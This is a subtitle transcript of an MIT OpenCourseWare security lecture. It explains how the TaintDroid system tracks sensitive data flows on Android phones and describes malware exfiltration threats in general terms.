1
00:00:00,080 --> 00:00:02,430
The following content is
provided under a Creative

2
00:00:02,430 --> 00:00:03,810
Commons license.

3
00:00:03,810 --> 00:00:06,050
Your support will help
MIT OpenCourseWare

4
00:00:06,050 --> 00:00:10,150
continue to offer high quality
educational resources for free.

5
00:00:10,150 --> 00:00:12,690
To make a donation or to
view additional materials

6
00:00:12,690 --> 00:00:16,600
from hundreds of MIT courses,
visit MIT OpenCourseWare

7
00:00:16,600 --> 00:00:17,310
at ocw.mit.edu.

8
00:00:25,732 --> 00:00:28,210
PROFESSOR: All right,
let's get started.

9
00:00:28,210 --> 00:00:29,820
Thank you for showing
up to this very

10
00:00:29,820 --> 00:00:32,619
special pre-Thanksgiving
lecture.

11
00:00:32,619 --> 00:00:35,570
I'm glad you guys have
such devotion to security,

12
00:00:35,570 --> 00:00:37,790
I'm sure that you will be
rewarded on the job market

13
00:00:37,790 --> 00:00:38,373
at some point.

14
00:00:38,373 --> 00:00:40,340
Feel free to list me
as a recommendation.

15
00:00:40,340 --> 00:00:42,877
So today we're going to
talk about taint tracking,

16
00:00:42,877 --> 00:00:45,210
and in particular we're going
to look at a system called

17
00:00:45,210 --> 00:00:47,950
TaintDroid that looks at how
to do this type of information

18
00:00:47,950 --> 00:00:51,930
flow analysis in the context
of Android smartphones.

19
00:00:51,930 --> 00:00:54,970
And so the basic problem
the paper deals with

20
00:00:54,970 --> 00:00:57,190
is this fact that apps
can exfiltrate data.

21
00:00:57,190 --> 00:00:58,940
So the basic idea
is that your phone

22
00:00:58,940 --> 00:01:01,670
contains a lot of sensitive
information, right.

23
00:01:01,670 --> 00:01:05,060
It contains your contacts
list and your phone number

24
00:01:05,060 --> 00:01:06,920
and your email and all
that kind of stuff.

25
00:01:06,920 --> 00:01:12,070
So if the operating system or
the phone itself isn't careful,

26
00:01:12,070 --> 00:01:14,550
then a malicious app
might be able to take

27
00:01:14,550 --> 00:01:17,030
some of that information
and send it back

28
00:01:17,030 --> 00:01:19,337
to its home server,
and that server

29
00:01:19,337 --> 00:01:21,170
can use it for all types
of nefarious things

30
00:01:21,170 --> 00:01:23,810
as we'll talk about later.

31
00:01:23,810 --> 00:01:29,900
The high-level solution that
the TaintDroid paper suggests

32
00:01:29,900 --> 00:01:35,320
is that we should basically
track the sensitive data as it

33
00:01:35,320 --> 00:01:37,940
flows through the system,
and essentially, we

34
00:01:37,940 --> 00:01:42,754
need to stop it from
going over the network.

35
00:01:42,754 --> 00:01:44,170
In other words,
we need to stop it

36
00:01:44,170 --> 00:01:50,380
from being passed as an argument
to networking system calls.

37
00:01:54,260 --> 00:01:56,400
And so presumably,
if we can do that,

38
00:01:56,400 --> 00:01:59,230
then we can essentially stop
the leak right at the moment

39
00:01:59,230 --> 00:02:00,940
that it's about to happen.

40
00:02:00,940 --> 00:02:02,660
So you might think
to yourself, so why

41
00:02:02,660 --> 00:02:05,470
are traditional
Android permissions

42
00:02:05,470 --> 00:02:09,770
insufficient to stop these
types of data exfiltrations?

43
00:02:09,770 --> 00:02:12,660
And the reason is that these
permissions don't really

44
00:02:12,660 --> 00:02:15,452
have the appropriate grammar to
talk about the type of attack

45
00:02:15,452 --> 00:02:16,660
that we're trying to prevent.

46
00:02:16,660 --> 00:02:18,493
So a lot of times these
Android permissions,

47
00:02:18,493 --> 00:02:21,400
they deal with these things
like can an application

48
00:02:21,400 --> 00:02:23,550
read or write to a
particular device.

49
00:02:23,550 --> 00:02:24,940
But we're talking
about something

50
00:02:24,940 --> 00:02:27,570
at a sort of different
level of semantics.

51
00:02:27,570 --> 00:02:30,620
We're saying even if an
application has been granted

52
00:02:30,620 --> 00:02:33,330
the authority to read or
write a particular device,

53
00:02:33,330 --> 00:02:35,830
like the network,
for example, it still

54
00:02:35,830 --> 00:02:40,100
might not be good to allow that
application to read or write

55
00:02:40,100 --> 00:02:43,000
certain sensitive data over
that device to which it

56
00:02:43,000 --> 00:02:44,890
has permissions.

57
00:02:44,890 --> 00:02:48,060
In other words, using these
traditional Android security

58
00:02:48,060 --> 00:02:49,690
policies, it is
difficult to speak

59
00:02:49,690 --> 00:02:51,997
about specific types of data.

60
00:02:51,997 --> 00:02:54,580
It's much easier to talk about
whether an application accesses

61
00:02:54,580 --> 00:02:55,620
a device or not.

62
00:02:55,620 --> 00:03:00,490
So you might think, all right,
so that's kind of a bummer,

63
00:03:00,490 --> 00:03:02,870
but maybe we can
solve this problem

64
00:03:02,870 --> 00:03:07,015
by-- we have this alternate
solution, so we'll

65
00:03:07,015 --> 00:03:08,600
call this solution star.

66
00:03:08,600 --> 00:03:11,410
So maybe we can
just never install

67
00:03:11,410 --> 00:03:21,410
applications that can do
reads of sensitive data

68
00:03:21,410 --> 00:03:24,690
and also have network access.

69
00:03:27,660 --> 00:03:29,890
At first glance, that
seems to solve the problem.

70
00:03:29,890 --> 00:03:31,430
Because if it can't do
both of these things,

71
00:03:31,430 --> 00:03:33,138
it either can't get
to the sensitive data

72
00:03:33,138 --> 00:03:35,879
in the first place, or it can,
but it can't send it anywhere.

73
00:03:35,879 --> 00:03:38,170
So does anyone have any ideas
where this probably isn't

74
00:03:38,170 --> 00:03:39,336
going to work out very well?

75
00:03:42,252 --> 00:03:43,960
Everyone's already
thinking about turkey.

76
00:03:43,960 --> 00:03:46,760
I can see in your eyes.

77
00:03:46,760 --> 00:03:50,500
The main reason why this
is probably a bad idea

78
00:03:50,500 --> 00:03:57,220
is that this is going to break a
lot of legitimate applications.

79
00:03:59,950 --> 00:04:02,234
So you could imagine that
there are a lot of programs,

80
00:04:02,234 --> 00:04:03,650
like maybe email
clients or things

81
00:04:03,650 --> 00:04:07,550
like that, that should actually
have the ability, perhaps,

82
00:04:07,550 --> 00:04:09,060
to read some data
that's sensitive

83
00:04:09,060 --> 00:04:12,044
and also send information
over the network.

84
00:04:12,044 --> 00:04:13,460
So if we just say
that we're going

85
00:04:13,460 --> 00:04:15,617
to prevent this sort of
and type of activity,

86
00:04:15,617 --> 00:04:17,700
then you're actually going
to make a lot of things

87
00:04:17,700 --> 00:04:20,019
that work right now fail.

88
00:04:20,019 --> 00:04:22,220
So users are not
going to like that.

89
00:04:22,220 --> 00:04:26,580
There's also a problem here is
that even if we did implement

90
00:04:26,580 --> 00:04:32,300
this solution, it's not going to
stop a bunch of different side

91
00:04:32,300 --> 00:04:35,890
channel mechanisms
for data leakage.

92
00:04:35,890 --> 00:04:37,930
So for example, we've
looked in previous classes

93
00:04:37,930 --> 00:04:40,750
about how the browser
cache, for example,

94
00:04:40,750 --> 00:04:43,900
can leak information about
whether a particular site has

95
00:04:43,900 --> 00:04:45,200
been visited or not.

96
00:04:45,200 --> 00:04:48,200
And so even if we have a
security policy like this,

97
00:04:48,200 --> 00:04:50,387
maybe we don't capture all
kinds of side channels.

98
00:04:50,387 --> 00:04:52,720
We'll talk about some other
side channels a little later

99
00:04:52,720 --> 00:04:54,870
in the lecture.

100
00:04:54,870 --> 00:05:01,250
Another thing that this
wouldn't stop is app collusion.

101
00:05:01,250 --> 00:05:05,040
So two apps can
actually collaborate

102
00:05:05,040 --> 00:05:07,220
to break the security system.

103
00:05:07,220 --> 00:05:10,400
So for example, what
if there's one app that

104
00:05:10,400 --> 00:05:12,060
doesn't have access
network, but it

105
00:05:12,060 --> 00:05:14,600
can talk to a second
application, which does.

106
00:05:14,600 --> 00:05:16,879
So maybe it can use
Android's IPC mechanisms

107
00:05:16,879 --> 00:05:18,920
to pass the sensitive data
to an application that

108
00:05:18,920 --> 00:05:21,170
does have network permissions,
and that second app can

109
00:05:21,170 --> 00:05:24,780
actually upload that
information to the server.

110
00:05:24,780 --> 00:05:27,920
And even if the apps
aren't colluding,

111
00:05:27,920 --> 00:05:31,540
then there may be
some type of trickery

112
00:05:31,540 --> 00:05:34,300
that an application
can engage in

113
00:05:34,300 --> 00:05:37,000
to trick some other applications
into accidentally revealing

114
00:05:37,000 --> 00:05:38,040
sensitive data.

115
00:05:38,040 --> 00:05:40,960
So maybe there's some type
of weakness in the way

116
00:05:40,960 --> 00:05:42,510
that the email
program is written,

117
00:05:42,510 --> 00:05:45,322
and so perhaps that
email program accepts

118
00:05:45,322 --> 00:05:47,280
too many random messages
from other things that

119
00:05:47,280 --> 00:05:48,340
are living on the system.

120
00:05:48,340 --> 00:05:50,850
So perhaps we could craft a
special intent that's somehow

121
00:05:50,850 --> 00:05:53,360
going to trick your Gmail
application, for example,

122
00:05:53,360 --> 00:05:57,409
into emailing something to
someone outside of the phone.

123
00:05:57,409 --> 00:05:59,950
At a high level, this approach
doesn't really work very well.

124
00:06:02,682 --> 00:06:04,390
One important thing
to think about is OK,

125
00:06:04,390 --> 00:06:06,681
so it seems like we're very
worried about the sensitive

126
00:06:06,681 --> 00:06:07,710
data leaving the phone.

127
00:06:07,710 --> 00:06:12,690
So what does Android malware
actually do in practice.

128
00:06:12,690 --> 00:06:16,364
Are there any kinds
of real world attacks

129
00:06:16,364 --> 00:06:18,030
that we're going to
be preventing by all

130
00:06:18,030 --> 00:06:19,950
this taint tracking type stuff.

131
00:06:19,950 --> 00:06:21,320
And the answer is yes.

132
00:06:21,320 --> 00:06:24,080
So increasingly, malware is
becoming a bigger problem

133
00:06:24,080 --> 00:06:25,080
for these mobile phones.

134
00:06:25,080 --> 00:06:31,020
So one thing it might do is
it might use your location

135
00:06:31,020 --> 00:06:37,325
or maybe your IMEI for ads.

136
00:06:40,227 --> 00:06:41,810
So similarly to
malware, it's actually

137
00:06:41,810 --> 00:06:44,060
going to look and see where
you are physically located

138
00:06:44,060 --> 00:06:46,970
in the world and then maybe
it will that oh, you're

139
00:06:46,970 --> 00:06:48,720
located near the MIT
campus, therefore you

140
00:06:48,720 --> 00:06:50,190
must be a hungry student
so hey, why don't you

141
00:06:50,190 --> 00:06:52,356
go to my food truck that
happens to be located right

142
00:06:52,356 --> 00:06:54,130
where you are.

143
00:06:54,130 --> 00:06:57,282
IMEI is kind of
like this-- you can

144
00:06:57,282 --> 00:07:00,410
think of it as an integer that's
like a per device uniquefier.

145
00:07:00,410 --> 00:07:02,924
So this could be used perhaps
to track you in ways that you

146
00:07:02,924 --> 00:07:04,965
don't want to be tracked,
in different locations,

147
00:07:04,965 --> 00:07:05,757
so on and so forth.

148
00:07:05,757 --> 00:07:07,381
So there's actually
malware in the wild

149
00:07:07,381 --> 00:07:08,840
that does things like that.

150
00:07:08,840 --> 00:07:11,080
Another thing that
malware might try to do

151
00:07:11,080 --> 00:07:13,040
is steal your credentials.

152
00:07:17,250 --> 00:07:22,850
So for example, it might try
to take your phone number,

153
00:07:22,850 --> 00:07:24,880
or it might try to
take your contact list,

154
00:07:24,880 --> 00:07:27,680
it might try to upload those
things to a remote server.

155
00:07:27,680 --> 00:07:30,690
Maybe that's useful for
trying to impersonate you,

156
00:07:30,690 --> 00:07:33,690
for example, in a
message that's going

157
00:07:33,690 --> 00:07:35,790
to be used for spam later on.

158
00:07:35,790 --> 00:07:39,990
There's malware out there that
does things like this today.

159
00:07:39,990 --> 00:07:44,290
Perhaps most horrifyingly,
at least for me,

160
00:07:44,290 --> 00:07:49,891
malware might be able to
turn your phone into a bot.

161
00:07:49,891 --> 00:07:52,140
This, of course, is a problem
that our parents did not

162
00:07:52,140 --> 00:07:53,120
have to deal with.

163
00:07:53,120 --> 00:07:55,380
Modern phones are so powerful
that they can actually

164
00:07:55,380 --> 00:07:57,845
be used to send out spam
messages themselves.

165
00:07:57,845 --> 00:08:00,230
So there's actually
a pretty nasty piece

166
00:08:00,230 --> 00:08:01,900
of malware that's
going around right now

167
00:08:01,900 --> 00:08:03,810
that seems to be targeting some
corporate environments that's

168
00:08:03,810 --> 00:08:04,710
doing precisely this.

169
00:08:04,710 --> 00:08:07,168
So it gets to your phone and
just starts sending out stuff.

170
00:08:07,168 --> 00:08:09,160
AUDIENCE: So this
type of malware,

171
00:08:09,160 --> 00:08:12,397
is it malware that subverts
the Android OS, or is it

172
00:08:12,397 --> 00:08:13,642
just a typical app?

173
00:08:13,642 --> 00:08:16,630
If it's a typical app, it
seems that it should be able--

174
00:08:16,630 --> 00:08:18,810
PROFESSOR: Yeah.

175
00:08:18,810 --> 00:08:20,720
That's a good question.

176
00:08:20,720 --> 00:08:22,720
There's both types
of malware out there.

177
00:08:22,720 --> 00:08:24,990
As it turns out, it's
actually fairly easy

178
00:08:24,990 --> 00:08:28,620
to get users to click on things.

179
00:08:28,620 --> 00:08:29,790
So I'll give you an example.

180
00:08:29,790 --> 00:08:31,290
This isn't necessarily
indicative of malware,

181
00:08:31,290 --> 00:08:32,832
more about the sad
state of humanity.

182
00:08:32,832 --> 00:08:34,373
There'll be a popular
game out there,

183
00:08:34,373 --> 00:08:35,832
let's say Angry
Birds, for example.

184
00:08:35,832 --> 00:08:37,997
You go to the App Store and
you type in Angry Birds,

185
00:08:37,997 --> 00:08:39,110
I want to get Angry Birds.

186
00:08:39,110 --> 00:08:40,880
So hopefully the
first hit that you get

187
00:08:40,880 --> 00:08:42,530
is the actual Angry Birds.

188
00:08:42,530 --> 00:08:46,160
But then the second hit will
be something like Angry Birdss,

189
00:08:46,160 --> 00:08:47,374
with two S's, for example.

190
00:08:47,374 --> 00:08:48,790
And a lot of people
will go there,

191
00:08:48,790 --> 00:08:50,789
and maybe it's cheaper
than the regular version,

192
00:08:50,789 --> 00:08:51,649
and they go there.

193
00:08:51,649 --> 00:08:53,440
It's going to present
that thing that says,

194
00:08:53,440 --> 00:08:55,450
do you allow this application
to do this, this, and this.

195
00:08:55,450 --> 00:08:57,275
The person is going say, yeah,
because I got to get my Angry

196
00:08:57,275 --> 00:08:58,190
Birds, yeah, sure.

197
00:08:58,190 --> 00:09:00,280
Boom, then that
person could be owned.

198
00:09:00,280 --> 00:09:01,910
So in practice you
see now where it

199
00:09:01,910 --> 00:09:03,520
exploits both types of vectors.

200
00:09:03,520 --> 00:09:06,800
But you're exactly right that
if you assume that the Android

201
00:09:06,800 --> 00:09:09,950
security model is correct,
then the malware sort

202
00:09:09,950 --> 00:09:13,760
has to depend on users
being foolish or naive

203
00:09:13,760 --> 00:09:15,869
and giving it network
access, for example,

204
00:09:15,869 --> 00:09:17,660
when your tic-tac-toe
game shouldn't really

205
00:09:17,660 --> 00:09:18,530
have network access.

206
00:09:21,814 --> 00:09:23,480
Yes, so you can
actually have your phone

207
00:09:23,480 --> 00:09:24,470
get turned into a bot.

208
00:09:24,470 --> 00:09:25,860
This is horrible for
multiple reasons,

209
00:09:25,860 --> 00:09:27,360
not only because
your phone is a bot

210
00:09:27,360 --> 00:09:28,930
but also because
maybe you're paying

211
00:09:28,930 --> 00:09:30,612
for data for all
those emails that are

212
00:09:30,612 --> 00:09:31,820
getting sent from your phone.

213
00:09:31,820 --> 00:09:33,640
Maybe your battery's
getting ground down

214
00:09:33,640 --> 00:09:36,610
because you phone's just
sitting around constantly

215
00:09:36,610 --> 00:09:41,740
sending ads about whenever, free
trips to Bermuda or whatever.

216
00:09:41,740 --> 00:09:45,170
There are actually malicious
applications out there

217
00:09:45,170 --> 00:09:48,975
that will use your private
information for bad.

218
00:09:48,975 --> 00:09:50,850
And the particularly
bad thing about this bot

219
00:09:50,850 --> 00:09:52,891
here is that it can actually
look at your contact

220
00:09:52,891 --> 00:09:54,380
list and some spam
on your behalf

221
00:09:54,380 --> 00:09:57,130
to people that you know and make
the likelihood of the victim

222
00:09:57,130 --> 00:09:59,380
clicking on something in
that email much, much higher.

223
00:10:01,511 --> 00:10:03,510
One thing to note, and
this kind of getting back

224
00:10:03,510 --> 00:10:04,660
to the discussion
we just had, so

225
00:10:04,660 --> 00:10:06,034
preventing this
data exfiltration

226
00:10:06,034 --> 00:10:07,240
is very nice, right.

227
00:10:07,240 --> 00:10:09,440
But in and of itself,
preventing that exfiltration

228
00:10:09,440 --> 00:10:11,512
doesn't stop the hack
in the first place.

229
00:10:11,512 --> 00:10:13,470
So there's actually
mechanisms that we actually

230
00:10:13,470 --> 00:10:15,910
should look at to prevent your
machine from getting owned

231
00:10:15,910 --> 00:10:18,249
in the first place or to
educate users about what they

232
00:10:18,249 --> 00:10:19,540
should and should not click on.

233
00:10:19,540 --> 00:10:20,914
So just doing this
taint tracking

234
00:10:20,914 --> 00:10:23,124
isn't a full solution for
preventing your machine

235
00:10:23,124 --> 00:10:24,165
from getting compromised.

236
00:10:26,910 --> 00:10:33,240
How is TaintDroid in
particular going to work?

237
00:10:33,240 --> 00:10:35,520
Let's see.

238
00:10:35,520 --> 00:10:38,460
So as I mentioned
before, TaintDroid

239
00:10:38,460 --> 00:10:43,760
is going to track all of
your sensitive information

240
00:10:43,760 --> 00:10:45,520
as it propagates
through the system.

241
00:10:45,520 --> 00:10:48,340
So TaintDroid
distinguishes between what

242
00:10:48,340 --> 00:10:51,140
they call information sources
and information sinks.

243
00:10:51,140 --> 00:10:58,240
So these sources are things
that generate sensitive data.

244
00:10:58,240 --> 00:11:02,520
So you might think of this
as things like sensors.

245
00:11:02,520 --> 00:11:05,310
So for example,
GPS, accelerometer,

246
00:11:05,310 --> 00:11:06,780
things like that.

247
00:11:06,780 --> 00:11:12,600
This could be your
contact list database,

248
00:11:12,600 --> 00:11:20,520
this could be things like the
IMEI, basically anything that

249
00:11:20,520 --> 00:11:24,000
might help to tie you,
a particular user,

250
00:11:24,000 --> 00:11:25,250
to your actual phone.

251
00:11:25,250 --> 00:11:28,220
So these are the things
that generate the taint.

252
00:11:28,220 --> 00:11:31,280
And then you can
think of these sinks

253
00:11:31,280 --> 00:11:36,170
as being the places where we
don't want tainted data to go.

254
00:11:36,170 --> 00:11:38,150
And so in the case
of TaintDroid,

255
00:11:38,150 --> 00:11:41,530
the particular sink that we're
concerned about is the network.

256
00:11:44,090 --> 00:11:47,690
As we'll talk about later, you
can generalize information flow

257
00:11:47,690 --> 00:11:49,990
to more scenarios than
TaintDroid specifically covers.

258
00:11:49,990 --> 00:11:52,281
So you can imagine there
might be other sinks in a more

259
00:11:52,281 --> 00:11:53,430
general purpose system.

260
00:11:53,430 --> 00:11:54,971
But for TaintDroid,
they're literally

261
00:11:54,971 --> 00:11:59,180
caring about the network as
the sink for information.

262
00:11:59,180 --> 00:12:08,550
So in TaintDroid, they're
going to use a 32-bit bitvector

263
00:12:08,550 --> 00:12:12,300
to represent taint.

264
00:12:12,300 --> 00:12:15,590
And so what this basically
means is that you can have,

265
00:12:15,590 --> 00:12:20,140
at most, 32 distinct
taint sources.

266
00:12:20,140 --> 00:12:22,510
So each sensitive
data value will

267
00:12:22,510 --> 00:12:24,204
have a one in a
particular position

268
00:12:24,204 --> 00:12:26,620
if it has been tainted by some
particular source of taint.

269
00:12:26,620 --> 00:12:31,370
That's like, has it been
derived from your GPS data,

270
00:12:31,370 --> 00:12:32,140
for example.

271
00:12:32,140 --> 00:12:34,370
Has it been derived from
something from your contacts

272
00:12:34,370 --> 00:12:37,540
list, and so on and so forth.

273
00:12:37,540 --> 00:12:41,680
One interesting thing is
that 32 sources of taint

274
00:12:41,680 --> 00:12:44,120
is actually not that big, right.

275
00:12:44,120 --> 00:12:47,960
And so an interesting
question is,

276
00:12:47,960 --> 00:12:49,900
is that big enough for
this particular system

277
00:12:49,900 --> 00:12:52,108
and is it big enough in
general for these information

278
00:12:52,108 --> 00:12:53,430
flow systems.

279
00:12:53,430 --> 00:12:55,860
So in a particular
case of TaintDroid,

280
00:12:55,860 --> 00:12:58,160
32 possible sources
of taint seems

281
00:12:58,160 --> 00:13:01,160
to be somewhat reasonable,
because it's actually

282
00:13:01,160 --> 00:13:04,360
looking at a fairly constrained
information flow problem.

283
00:13:04,360 --> 00:13:07,230
So it's saying given all the
sensors you have on your phone,

284
00:13:07,230 --> 00:13:09,400
given all of these
sensitive databases,

285
00:13:09,400 --> 00:13:12,000
and things like that,
32 seems roughly

286
00:13:12,000 --> 00:13:15,250
the right order of
magnitude in terms

287
00:13:15,250 --> 00:13:18,170
of storing these taint flags.

288
00:13:18,170 --> 00:13:21,100
And as we'll see in the
implementation of this system,

289
00:13:21,100 --> 00:13:22,600
32 is actually very
convenient, too,

290
00:13:22,600 --> 00:13:24,390
because what else is 32 bits?

291
00:13:24,390 --> 00:13:25,590
Well, an integer.

292
00:13:25,590 --> 00:13:28,006
So you can actually do some
very efficient representations

293
00:13:28,006 --> 00:13:30,650
of these taint flags in the way
that they actually build this.

294
00:13:30,650 --> 00:13:32,150
As we'll discuss a
little bit later,

295
00:13:32,150 --> 00:13:36,090
though, if you want to expose
information flow to programmers

296
00:13:36,090 --> 00:13:38,310
in a more generic
way, so for example,

297
00:13:38,310 --> 00:13:40,440
if you want programmers
be able to specify

298
00:13:40,440 --> 00:13:44,080
their own sources of taint
and their own types of sink,

299
00:13:44,080 --> 00:13:46,660
then 32 bits probably
isn't enough.

300
00:13:46,660 --> 00:13:48,060
In systems like
that you actually

301
00:13:48,060 --> 00:13:51,790
have to think about including
more complex runtime support

302
00:13:51,790 --> 00:13:54,960
for a larger label space.

303
00:13:54,960 --> 00:13:57,720
So does that all make sense?

304
00:13:57,720 --> 00:14:02,830
OK so roughly speaking,
when you look at the way

305
00:14:02,830 --> 00:14:06,370
that a taint flows through
the system, at a high level,

306
00:14:06,370 --> 00:14:09,750
it basically goes from the
right hand side of a statement

307
00:14:09,750 --> 00:14:11,160
to the left hand side.

308
00:14:11,160 --> 00:14:16,060
So as a very simple example,
if you had some statement,

309
00:14:16,060 --> 00:14:19,180
like you declare an integer
variable that's going to get

310
00:14:19,180 --> 00:14:27,520
your latitude, and then a high
level you call gps.getLat(),

311
00:14:27,520 --> 00:14:31,770
then essentially this thing here
is going to generate a value

312
00:14:31,770 --> 00:14:33,972
that has some taint
that's associated with it.

313
00:14:33,972 --> 00:14:35,930
Some particular flag will
be set that indicates

314
00:14:35,930 --> 00:14:38,400
that hey, this
value I'm returning

315
00:14:38,400 --> 00:14:39,650
comes from a sensitive source.

316
00:14:39,650 --> 00:14:41,941
So the taint will come from
here on the right hand side

317
00:14:41,941 --> 00:14:43,600
and go over here to
the left hand side,

318
00:14:43,600 --> 00:14:45,840
and now that is
actually tainted.

319
00:14:45,840 --> 00:14:49,210
So that's sort of what it
looks like from the perspective

320
00:14:49,210 --> 00:14:52,080
of the human developer
who writes source code.

321
00:14:52,080 --> 00:14:56,284
However, the Dalvik VM actually
uses this register-based format

322
00:14:56,284 --> 00:14:58,200
at the lower level to
actually build programs,

323
00:14:58,200 --> 00:15:00,770
and that's actually the way
that these taint semantics

324
00:15:00,770 --> 00:15:03,864
are implemented in reality.

325
00:15:03,864 --> 00:15:06,030
This is what's explained
in table one of the papers,

326
00:15:06,030 --> 00:15:09,345
so they have this big list
of classes of opcodes,

327
00:15:09,345 --> 00:15:11,720
and they describe how
taint sort of flows

328
00:15:11,720 --> 00:15:12,880
for those types of opcodes.

329
00:15:12,880 --> 00:15:14,950
So for example,
you might imagine

330
00:15:14,950 --> 00:15:20,060
that you have an operation
that looks kind of like a move,

331
00:15:20,060 --> 00:15:24,990
and so it mentions a
destination and a source.

332
00:15:24,990 --> 00:15:28,334
So in Dalvik, to register
a base virtual machines,

333
00:15:28,334 --> 00:15:29,750
so you can think
of these as being

334
00:15:29,750 --> 00:15:33,450
registers on this sort of
abstract computation engine.

335
00:15:33,450 --> 00:15:36,990
And so essentially what happens
here is that, like I said,

336
00:15:36,990 --> 00:15:39,557
taint goes from the right hand
side to the left hand side.

337
00:15:39,557 --> 00:15:41,390
So in this case, when
the Dalvik interpreter

338
00:15:41,390 --> 00:15:43,190
executes this
instruction here, it's

339
00:15:43,190 --> 00:15:45,830
going to look at the
taint label, this,

340
00:15:45,830 --> 00:15:48,050
and it's going to
assign it over here.

341
00:15:50,714 --> 00:15:53,130
Then you might imagine you
have another instruction that's

342
00:15:53,130 --> 00:15:55,110
like a binary operation.

343
00:15:55,110 --> 00:15:59,300
So think of this as something
like addition, for example.

344
00:15:59,300 --> 00:16:01,480
So here you'll have
a single destination,

345
00:16:01,480 --> 00:16:07,350
but then you'll
have two sources.

346
00:16:07,350 --> 00:16:09,000
And what will
happen in this case

347
00:16:09,000 --> 00:16:12,120
is that when Dalvik interpreter
encounters this instruction,

348
00:16:12,120 --> 00:16:14,040
it'll take the taints
of both of these,

349
00:16:14,040 --> 00:16:18,960
construct a union of those,
and then assign that union

350
00:16:18,960 --> 00:16:22,049
to be the taint tag over here.

351
00:16:22,049 --> 00:16:23,090
Does that all make sense?

352
00:16:23,090 --> 00:16:24,470
It's fairly straightforward.

353
00:16:24,470 --> 00:16:28,250
So the table breaks down all the
different types of instructions

354
00:16:28,250 --> 00:16:30,952
that you'll see, but to
a first approximation,

355
00:16:30,952 --> 00:16:32,660
these are the most
common ways that taint

356
00:16:32,660 --> 00:16:34,500
propagates through the system.

357
00:16:34,500 --> 00:16:37,350
Now there are actually some
interesting special cases

358
00:16:37,350 --> 00:16:39,240
that they mention in the paper.

359
00:16:39,240 --> 00:16:46,680
So one of those special
cases involves arrays.

360
00:16:46,680 --> 00:16:49,130
Let's say that you
have some code that's

361
00:16:49,130 --> 00:16:53,470
going to declare a
character, and you

362
00:16:53,470 --> 00:16:56,480
get the value for the character
somehow, doesn't really matter.

363
00:16:56,480 --> 00:17:02,380
And then let's say the
program declares some array,

364
00:17:02,380 --> 00:17:04,609
we'll call it upper().

365
00:17:04,609 --> 00:17:15,020
And it's basically going to have
uppercase versions of letters.

366
00:17:15,020 --> 00:17:16,980
And so one very common
thing to do in code

367
00:17:16,980 --> 00:17:20,690
is to index into an array like
this using, for example, maybe

368
00:17:20,690 --> 00:17:22,580
just C directly,
because as we all know,

369
00:17:22,580 --> 00:17:25,079
Kernighan and Ritchie teach us
that basically characters are

370
00:17:25,079 --> 00:17:26,710
integers, so hooray for that.

371
00:17:26,710 --> 00:17:29,670
So you can imagine that
you have some code that

372
00:17:29,670 --> 00:17:33,960
says something like the upper
case version of this character

373
00:17:33,960 --> 00:17:38,080
here is going to be whatever
is at a particular index

374
00:17:38,080 --> 00:17:43,400
in this table here, in the
index that table by c like this.

375
00:17:43,400 --> 00:17:48,780
So there's a question of what
taint should this receive.

376
00:17:48,780 --> 00:17:50,280
It seems pretty
straightforward what

377
00:17:50,280 --> 00:17:52,930
should happen in these
cases, but in this case,

378
00:17:52,930 --> 00:17:55,352
it seems like we have multiple
things that are going on.

379
00:17:55,352 --> 00:17:57,810
We've got this array here that
may have some type of taint,

380
00:17:57,810 --> 00:17:59,476
we've got this character
c here that may

381
00:17:59,476 --> 00:18:01,500
have some type of taint.

382
00:18:01,500 --> 00:18:04,350
What Dalvik decides
to do in this case

383
00:18:04,350 --> 00:18:05,835
is a little bit
similar to what it

384
00:18:05,835 --> 00:18:08,000
does in the case of
this binary op here.

385
00:18:08,000 --> 00:18:11,450
So it's essentially going to say
that this character over here

386
00:18:11,450 --> 00:18:15,500
is going to get the union
of the taint of c and also

387
00:18:15,500 --> 00:18:16,800
of the array.

388
00:18:16,800 --> 00:18:19,930
And the intuition behind
that is that to generate

389
00:18:19,930 --> 00:18:23,000
this character, we somehow
had to know something

390
00:18:23,000 --> 00:18:24,320
about this array here.

391
00:18:24,320 --> 00:18:26,702
We had to know something
about this index here.

392
00:18:26,702 --> 00:18:28,160
So therefore I
guess it makes sense

393
00:18:28,160 --> 00:18:30,789
that this thing should
be as sensitive as both

394
00:18:30,789 --> 00:18:31,830
of these things combined.

395
00:18:35,580 --> 00:18:38,220
AUDIENCE: Can you explain
again move op and binary

396
00:18:38,220 --> 00:18:40,860
op, what exactly it means,
like the union of a taint.

397
00:18:40,860 --> 00:18:48,320
PROFESSOR: Yes, so
imagine that-- let's look

398
00:18:48,320 --> 00:18:49,800
at the move op here.

399
00:18:49,800 --> 00:18:53,030
So imagine that this
source operation here just

400
00:18:53,030 --> 00:18:56,050
had-- actually, let
me get more concrete.

401
00:18:56,050 --> 00:18:57,760
So each variable,
as I'll described

402
00:18:57,760 --> 00:19:00,610
in a second what a variable is,
has this integer, essentially,

403
00:19:00,610 --> 00:19:02,460
that has a bunch of
bits that are set

404
00:19:02,460 --> 00:19:04,550
according to what taint it has.

405
00:19:04,550 --> 00:19:06,760
So imagine each one of
these values flying around

406
00:19:06,760 --> 00:19:08,270
has this associated
integer flying

407
00:19:08,270 --> 00:19:09,740
around that has some bits set.

408
00:19:09,740 --> 00:19:14,415
So let's say that this source
had two bits set, corresponding

409
00:19:14,415 --> 00:19:16,540
to the fact that it had
been tainted by two things,

410
00:19:16,540 --> 00:19:17,510
it doesn't really matter.

411
00:19:17,510 --> 00:19:20,093
So what the interpreter will do
is it will look at this source

412
00:19:20,093 --> 00:19:22,560
thing, it'll look at
the associated integer,

413
00:19:22,560 --> 00:19:24,550
and it'll say aha.

414
00:19:24,550 --> 00:19:27,410
I should take that integer
has those two bits set

415
00:19:27,410 --> 00:19:33,775
and then essentially make that
integer the taint tag for this.

416
00:19:33,775 --> 00:19:35,400
So that's sort of a
simple case, right.

417
00:19:35,400 --> 00:19:37,160
The more complicated case,
like what does the union

418
00:19:37,160 --> 00:19:38,060
actually look like.

419
00:19:38,060 --> 00:19:44,480
So imagine that we've
got these two things here

420
00:19:44,480 --> 00:19:48,524
and we've got
source 0, source 1.

421
00:19:48,524 --> 00:19:49,940
And so I'm going
to show you here,

422
00:19:49,940 --> 00:19:53,719
these are the tainted
bits for this particular--

423
00:19:53,719 --> 00:19:54,635
AUDIENCE: [INAUDIBLE]?

424
00:19:54,635 --> 00:19:58,819
PROFESSOR: Yeah, so
imagine that you have

425
00:19:58,819 --> 00:20:00,110
this is the taint for this one.

426
00:20:00,110 --> 00:20:03,650
And imagine that the taint
for this one is this.

427
00:20:03,650 --> 00:20:07,030
So what's the taint going
to look like for dest?

428
00:20:07,030 --> 00:20:10,320
